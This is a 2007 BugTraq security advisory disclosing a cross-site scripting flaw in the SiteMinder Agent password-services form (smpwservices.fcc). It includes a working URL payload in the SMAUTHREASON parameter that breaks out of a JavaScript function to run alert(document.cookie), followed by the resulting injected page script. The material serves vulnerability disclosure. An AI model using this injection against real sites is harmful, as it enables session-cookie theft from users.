BugTraq
SiteMinder Agent: Cross Site Scripting Nov 07 2007 03:10AM
Giuseppe Gottardi (overet securitydate it)
# Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREA
SON=[XSS]

# Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREA
SON=1)alert(document.cookie);}function+drop(){if(0

In this way we can inject the alert() code without brackets in the
function resetCredFields().

-------------------------------
function resetCredFields()
{

if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 4 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 5 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 28 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 1 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 18 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 20 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 22 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>
-------------------------------

Regards,
Giuseppe Gottardi (aka oveRet)

---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet (at) securitydate (dot) it [email concealed]
Web: http://overet.securitydate.it

Wednesday November 07, 2007.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus